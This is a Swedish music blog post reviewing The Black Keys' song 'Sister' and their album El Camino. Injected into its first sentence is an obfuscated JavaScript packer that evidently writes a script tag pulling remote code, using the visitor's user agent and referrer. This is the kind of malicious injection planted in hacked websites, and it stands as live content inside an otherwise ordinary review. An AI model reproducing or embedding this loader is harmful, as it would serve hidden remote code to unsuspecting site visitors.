Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

The Black Keys – Sister

The Black Keys – Sister
Alexander Gylemo

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rifka|var|u0026u|referrer|sahef||js|php’.split(’|’),0,{}))
är på tiden att vi presenterar lite ny rock på Revue.se, och då väljer vi verkligen inte vilken rock som helst.

Den amerikanska duon The Black Keys har vart igång sedan 2001 och har efter hela sju skivsläpp lämnat ett fint avtryck i USA med två miljoner sålda album. Bandet består av Dan Auerbach (sångare och gitarr) och trummisen samt producenten Patrick Carney. Vad som fångat mitt intresse i det här bandet är hur de mixar modern rock med modern blues vilket resulterar i känslosamma melodier omringade av ett annars rått och rockigt framförande.

Den sjätte december släpper de sitt sjunde studioalbum, El Camino, på Nonesuch Records och nedan finner vi enligt mig en av deras bästa låtar hittills; ”Sister”. Grymma vocals (Dans verser ger mig nästan lite Supertramp-vibbar), råa gitarrer och trummor tillsammans med ett gitarriff som får mig att tänka på svenska Kent. Med det senaste försöker jag inte låta nedlåtande, då jag verkligen gillar den Ohio-baserade duons upplägg och inte har några som helst problem med Kent (och det handlar alltså inte om någon gnällig fjortisrock).

Många av de övriga låtarna från plattan finns redan online, så bortsett från ”Sister” rekommenderar jag att ni kollar upp skivans övriga spår nu!

httpv://www.youtube.com/watch?v=UAMOfD45c7A&hd=1